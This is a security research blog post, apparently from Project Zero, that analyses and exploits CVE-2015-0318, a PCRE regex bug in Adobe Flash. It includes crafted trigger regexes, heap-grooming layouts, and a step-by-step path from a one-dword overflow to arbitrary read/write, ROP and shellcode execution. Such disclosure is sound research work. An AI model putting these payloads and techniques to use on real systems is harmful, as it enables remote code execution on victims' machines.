Posted by Mark Brand, Irregular Expressionist
So; issue 199/PSIRT-3161/CVE-2015-0318. Quick summary - it’s a bug in the PCRE regex engine as used in Flash. (Note that the published version of the avmplus code is significantly out of date; there are a number of other vulnerabilities present that have already been fixed by Adobe; so auditing it can be a little frustrating!).
Spoiler: it’s exploitable. Grab the exploit from the issues page and read along.
So, for a little bit of background - PCRE is the regular expression library used in Flash to back their implementation of the RegExp object. PCRE is a complex library, that supports several different operating modes, including a JIT. However, the mode that is used by Flash is one in which the regex string is parsed and compiled to an internal bytecode (‘PCRE bytecode’) that is then interpreted in order to match the regex; so for vulnerabilities in Flash we are mainly interested in vulnerabilities either in the regex parsing, the bytecode compilation or during the interpretation. This particular vulnerability results from an issue in the bytecode compilation; and the root cause of the issue can be found in this code, starting at line 743:
/* For \c, a following letter is upper-cased; then the 0x40 bit is flipped.
This coding is ASCII-specific, but then the whole concept of \cx is
ASCII-specific. (However, an EBCDIC equivalent has now been added.) */
case 'c': <---- There’s no check to see if we’re in UTF8 mode
c = *(++ptr); <---- This could be part of a multibyte unicode character
if (c == 0)
{
*errorcodeptr = ERR2;
break;
}
#ifndef EBCDIC /* ASCII coding */
if (c >= 'a' && c <= 'z') c -= 32;
c ^= 0x40;
#else /* EBCDIC coding */
if (c >= 'a' && c <= 'z') c += 64;
c ^= 0xC0;
#endif
break;
Below is what happens when we compile a regex that combines the \c escape sequence (which is intended to match a single ASCII character) with a multibyte UTF-8 character. A simple trigger for the bug is ‘\\c\xd0\x80+’, below.
\cЀ+
This will compile to the following bytecode:
0000 5d0009 93 BRA [9]
0003 1bc290 27 CHAR ['\xc2\x90']
0006 201b 32 PLUS ['\x1b']
0008 80 128 INVALID
0009 540009 84 KET [9]
000c 00 0 END
So clearly something has gone wrong… The question is now how to leverage this invalid bytecode to get code execution. Unfortunately, if we simply execute the expression, the behaviour on encountering an invalid opcode is simply to terminate the match as a failure; not a very exciting possibility.
There are however a number of other functions in pcre_compile.cpp that give us some additional options; the one that I chose to use was find_brackets, as this iterates through the current bytecode, has a permissive default case, and is used to locate (and patch in an offset to) a numbered group; so there is the possibility to perhaps cause some interesting memory corruption or get execution of PCRE bytecode somewhere other than the legitimate bytecode.
This turns out to be the case; by adding a back-reference to our regular expression,
\cЀ+(?1)
/* Add in the fixed length from the table */
code += _pcre_OP_lengths[c];
Now, _pcre_OP_lengths is a global array, and 0x80 indexes a little way past the end of the array, conveniently this is (on Windows and Linux, at least) located in the Flash binary directly before an array of strings used for internationalisation. In every version of Flash I looked at, this will get us a length of 110 (which is significantly larger than any valid bytecode op length), so if we can groom the heap, we can hop the code pointer out of the allocated bytecode buffer and into data we control. We then just need to arrange to have find_bracket locate the bytecode pattern it’s hunting for in that buffer, and then it will helpfully link our malicious bytecode into the regex program, ready to be executed.
We run into a slight hiccup when we want to actually execute this regex; the bytecode interpreter will exit when encountering an invalid opcode. However, we can get around this fairly easily by wrapping our broken bytecode in an optional group;
(\cЀ+)?(?2)
With an appropriate groom with buffers containing the bytecode for group 2, we get a successful compilation to:
LEGITIMATE HEAP BUFFER
0000 5d001b 93 BRA [27]
0003 66 102 BRAZERO
0004 5e000b0001 94 CBRA [11, 1]
0009 1bc290 27 CHAR ['\xc2\x90']
000c 201b 32 PLUS ['\x1b']
000e 80 128 INVALID
000f 54000b 84 KET [11]
0012 5c0006 92 ONCE [6]
0015 510083 81 RECURSE [131] <---- this 131 is the bytecode index to recurse to (131 == 0x83, at the start of our groomed heap buffer)
0018 540006 84 KET [6]
001b 54001b 84 KET [27]
001e 00 0 END
…
GROOMED HEAP BUFFER
0083 5e00880002 94 CBRA [136, 2]
0088 540088 84 KET [136]
When we execute this regex, things look good for us, since the execution path we’ll take is the following:
0000 5d001b 93 BRA [27]
0003 66 102 BRAZERO
0004 5e000b0001 94 CBRA [11, 1]
0009 1bc290 27 CHAR ['\xc2\x90'] <---- Fail, backtrack
0015 510083 81 RECURSE [131]
0083 5e00880002 94 CBRA [136, 2] <---- Now executing inside our groomed heap buffer
0088 540088 84 KET [136]
0018 540006 84 KET [6]
001b 54001b 84 KET [27]
001e 00 0 END
So, at this point we can happily insert arbitrary regex bytecode in between our CBRA and KET in our groomed heap buffer.
The PCRE bytecode interpreter is surprisingly robust; and it took quite a while before I found a useful primitive for corrupting memory from this point. The majority of memory accesses from the interpreter are validated; if not perfectly (there are a lot of opportunities for out-of-bounds reads, or similar, but at this point we really need a write primitive) then sufficiently to prevent an out-of-bounds write that we can leverage further.
There is, however, an interesting piece of code; in the handling for CBRA, there is a bad assumption made about the group number (second parameter of the opcode). Code snippet below (from pcre_exec.cpp, beautified and some debug code removed).
case OP_CBRA:
case OP_SCBRA:
number = GET2(ecode, 1 + LINK_SIZE); <---- we control number
offset = number << 1; <---- we control offset
if (offset < md->offset_max) <---- bounds check that offset within offset_vector
{
save_offset3 = md->offset_vector[md->offset_end - number]; <---- we control number, so if number is 0, we index at md->offset_end, which is one past the end of the array
save_capture_last = md->capture_last;
if (ES3_Compatible_Behavior) // clear all matches for groups > than this one
{ // (we only really need to reset all enclosed groups, but
// covering all groups > this is harmless because
// we interpret from left to right)
savedElems = (offset_top > offset ? offset_top - offset : 2);
if (savedElems > frame->XoffsetStackSaveMax)
{
if (frame->XoffsetStackSave != frame->XoffsetStackSaveStg)
{
(pcre_free)(frame->XoffsetStackSave);
}
frame->XoffsetStackSave = (int *)(pcre_malloc)(savedElems * sizeof(int));
if (frame->XoffsetStackSave == NULL)
{
RRETURN(PCRE_ERROR_NOMEMORY);
}
frame->XoffsetStackSaveMax = savedElems;
}
VMPI_memcpy(offsetStackSave, md->offset_vector + offset, (savedElems * sizeof(int)));
for (int resetOffset = offset + 2; resetOffset < offset_top; resetOffset++)
{
md->offset_vector[resetOffset] = -1;
}
}
else
{
offsetStackSave[1] = md->offset_vector[offset];
offsetStackSave[2] = md->offset_vector[offset + 1];
savedElems = 0;
}
md->offset_vector[md->offset_end - number] = eptr - md->start_subject; <---- even better, we write the current length of the match there; this is becoming interesting.
So, we can write some data we control one dword past the end of offset_vector. As it happens, normally offset_vector is a stack buffer allocated in RegExpObject.cpp.
ArrayObject* RegExpObject::_exec(Stringp subject,
StIndexableUTF8String& utf8Subject,
int startIndex,
int& matchIndex,
int& matchLen)
{
AvmAssert(subject != NULL);
int ovector[OVECTOR_SIZE];
int results;
int subjectLength = utf8Subject.length();
This is of little interest though; it’s unlikely that our single dword write off the end of that buffer is going to achieve anything useful - I didn’t check, but modern compiler mitigations, such as variable reordering and stack cookies should prevent this path from being exploitable, and we have an easier option available to us. In the case where we have more capturing groups in our regex than will fit in this buffer, PCRE will allocate a suitable buffer on the heap when it executes the expression.
/* If the expression has got more back references than the offsets supplied can
hold, we get a temporary chunk of working store to use during the matching.
Otherwise, we can use the vector supplied, rounding down its size to a multiple
of 3. */
ocount = offsetcount - (offsetcount % 3);
if (re->top_backref > 0 && re->top_backref >= ocount / 3)
{
ocount = re->top_backref * 3 + 3;
md->offset_vector = (int *)(pcre_malloc)(ocount * sizeof(int));
if (md->offset_vector == NULL)
{
return PCRE_ERROR_NOMEMORY;
}
using_temporary_offsets = TRUE;
DPRINTF(("Got memory to hold back references\n"));
}
else
{
md->offset_vector = offsets;
}
md->offset_end = ocount;
md->offset_max = (2 * ocount) / 3;
md->offset_overflow = FALSE;
md->capture_last = -1;
Excellent, things are coming together. We can now write a dword that we mostly control (it can’t really be very big) after the end of a heap allocation, as long as the allocation is at least larger than 99 * 4 = 396. As we need to write directly after the end of the allocation, looking at the Flash heap allocator tells us that 504 bytes is the first bucket size that we can match exactly; and we’ll need a md->top_backref == 41 to achieve this. This can simply be achieved by adding a some capturing groups and a back reference.
(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\cЀ+)?(?43)
Another issue we’ll hit shortly is that Flash doesn’t validate whether the regex compiled successfully; if our first heap groom failed, then find_bracket will not find a match for the group, and compilation will fail. This is annoying when we’re trying to debug our exploit, so we can add a constant match string to the start of the regex that we can use to test whether the regex compiled successfully.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\cЀ+)?(?70))
As mentioned above; we’re going to need to have a heap groom to get our bytecode positioned directly after the buffer used to compile our regex into; to make things simple, we’ll pad our regex so that this buffer is a nice round number for the Flash heap allocator again; the next available bucket is 576 bytes, and each single character match adds 2 bytes.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\cЀ*)?(?70))
We need one more modification to make this useful; the value that we are overwriting with is the length of the current match, so we need a way to easily control that. We can just change the first group to match an arbitrary number of a different character, and we’re good to go:
(c01db33f|(B*)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\cЀ*)?(?70))
NB: in the exploit code, the B is replaced by one of a selection of characters - this is because Flash caches (successfully and unsuccessfully) compiled regexes, and if our groom fails we want to actually force a recompilation of the regex.
So, this gets us the initial regex that we’re going to compile as the first stage of our exploit. We’ve figured out the payload bytecode that we need to trigger the OOB write, which is the following:
0000 5e00010046 94 CBRA [1, 70]
0005 5e00000000 94 CBRA [0, 0]
000a 6d 109 ACCEPT
The accept is needed since to successfully reach the write, we need for the group with number 0 to be a match; accept will force this with the least messing around required.
Now, it’s entirely the case that the write primitive we have would normally be quite annoying; in many situations this would barely be the start of an exploit - while we control the size of the allocation that we’re writing past the end of it has to be pretty large, which rules out a lot of objects with vtables; and since the value we’re overwriting with is the length of our current match, overwriting a pointer would be a mess anyway. Happily, in Flash, there is a one-size-fits-all solution to all heap exploitation woes - Vector.<uint>. We can allocate these objects in any size we like (more-or-less), and the first dword is a length field. Once we’ve corrupted that length, we are going to have no problem producing an arbitrary read/write primitive, and getting stable exploitation.
1 - Compile regex
First we allocate a large number of buffers of size 504 (the same as our compiled regex) and fill them with our exploit bytecode.
_______________________________________________________________________________________
|exploit-bytecode------------|exploit-bytecode------------|exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
We then free every second buffer, leaving a lot of nicely sized gaps that are too tempting for the Flash heap allocator to overlook.
_______________________________________________________________________________________
|exploit-bytecode------------|FREE |exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
So that when we try to compile our regular expression, we’re almost certainly going to end up just where we want to be, with a copy of our exploit bytecode directly after the allocated buffer.
_______________________________________________________________________________________
|exploit-bytecode------------|ERCP|metadata|regex-bytecode|exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
2 - Execute regex to corrupt vector length
We’re actually going to be a bit more fancy here; since ideally we’d like to have a Vector.<uint> with length 0xffffffff so that we can read and write all of memory, we’ll actually make gaps followed by two Vector.<uint>’s. These allocations now need to be size 576, as that’s the size of our offset_vector.
_______________________________________________________________________________________
|length|vector---------------|length|vector---------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
Like so:
_______________________________________________________________________________________
|FREE |length|vector---------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
When our regex is executed, the current length of the match will be written one dword past the end of the allocated offset_vector, corrupting the length field of the first vector:
_______________________________________________________________________________________
|offset_vector---------------|corrupt|vector--------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
We only need to increase the length of the first vector by 1, and then we can use the first vector to completely control the length of the second vector:
_______________________________________________________________________________________
|offset_vector---------------|length+1|vector--------------------|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
_______________________________________________________________________________________
|offset_vector---------------|length+1|vector---------------|UINT_MAX|vector-----------------------
````````````````````````````````````````````````````````````````````````````````````````
At this point, we have read-write access to the entire address space of the running Flash process, and it’s pretty much game over; the only remaining major issue is that we don’t know exactly where our extra-large Vector.<uint> is based, so any memory accesses we do are relative to that buffer.
3 - Where is our corrupted Vector?
Conveniently, the PCRE code deterministically frees the buffer that was allocated for the oversized offset vector immediately before returning to actionscript. This means that we can look back behind our vector and grab a freelist pointer from inside that free block.
_______________________________________________________________________________________
|FREE |ptr| |length|vector-------------|UINT_MAX|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
This pointer will point to the next available block, which will most likely be the block following our extra-large vector; we can sanity check this a little, but it’s not really necessary - the block size is large, and this is a pretty safe bet. As we know the precise size of the heap allocations, we can use this to compute the address of our extra-large vector, and turn our relative read-write primitive into an absolute read-write.
_______________________________________________________________________________________________________
|FREE |ptr| |length|vector-------------|UINT_MAX|vector---------------|FREE|ptr|
``````````|`````````````````````````````````````````````````````````````````````````````^``````````````
|_____________________________________________________________________________|
4 - Formalities
The rest of this is really a 101 on exploiting a userland Windows arbitrary read/write; feel free to skip if you get bored...
4 (i) Finding a module
We’ve sort-of bypassed ASLR by locating our Vector object; but we don’t really know where everything is yet; ideally we need a pointer into a loaded module that we can use for code-reuse techniques. One way to get such a pointer would be to spray the heap some more with objects containing pointers, but we don’t need to do this today.
As it happens, there’s a nice structure at the start of every page used by the Flash FixedAlloc allocator that contains a pointer that eventually chains to a static instance of a C++ class; this is inside the Flash module, so we can use this to locate the Flash module in memory. See the exploit code…
Once we have a pointer inside a module, we can scan backwards from that pointer, checking the start of each page for the magic MZ header to locate the module base. It’s then just a matter of parsing the PE file format to locate useful imports and byte sequences that we can use in the final stage of our exploit.
4 (ii) Something to overwrite
Again, we’ve sort-of bypassed ASLR… If this was a linux exploit, and there was no RELRO, we could just overwrite a function pointer in the GOT section like in Chris’ previous blog post; on Windows there’s not quite such a convenient technique. With some reverse engineering of the Flash binary, we’d probably find a global function pointer somewhere that we could overwrite, but it’s easier to arrange for something on the heap.
If we create another ActionScript class, then when we instantiate this class, this will be an allocation on the heap, and it will contain a vtable pointer that’s used to resolve method invocations on that object. We can make a class with some readily signaturable bytes in it, and make it easy to find; then by walking the heap structures we can safely locate this class instance without risk of touching unmapped memory and crashing.
4 (iii) Getting control of execution
An interesting and useful feature of the Flash JIT is that if the arguments to a method invocation can be determined to be simple native types, then they will actually be pushed onto the native stack (as in a normal, native function call). This means that by overwriting the function pointer for a function with a lot of uint parameters, we can control a large block of the native stack when that function is called, letting us ROP directly on the legitimate program stack.
All we need to do is make a call to VirtualProtect to mark the page with our Vector in it as executable, and we can put our shellcode in there and just jump to that buffer.
A slight trick is that by arranging for lots of stack space to be used by nonsense arguments; we can make enough stack space so that when VirtualProtect is called, it won’t damage the real Flash stack frames (which are both above and below our fake stack frames…).
4 (iv) Returning control of execution
So, we’ve successfully redirected execution - all that remains is to return control of execution to Flash, and tie up a few loose ends. Taking stock of the damage that we’ve done to the process; if everything went well, we’ve only corrupted 3 dwords of process memory that are actually being used by Flash, so it should be fairly easy to clean up and continue execution:
The length of the first vector was increased by 1
The length of the second vector was increased to UINT_MAX
The function pointer for our method
1 is cleaned up immediately by the exploit once we have overwritten the length of the second vector; there’s no need to leave that as is. 2 needs to be cleaned up, since when the vector is free’d Flash will try to clear all of the memory… This can be done trivially from actionscript though, once we no longer need the vector; in fact we fix this before getting control of execution, since we can be sure that 3 will never be used again, and so don’t need to fix it.
This means that if we can just line up things right, we can just return back as though the method invocation succeeded, and Flash will keep running as though everything is just fine. Practically, the simplest way to achieve this was to fix up the stack frame to contain the correct function pointer, and jump to the actual method implementation; so essentially our ROP payload and shellcode act as a transparent function hook applied to the method.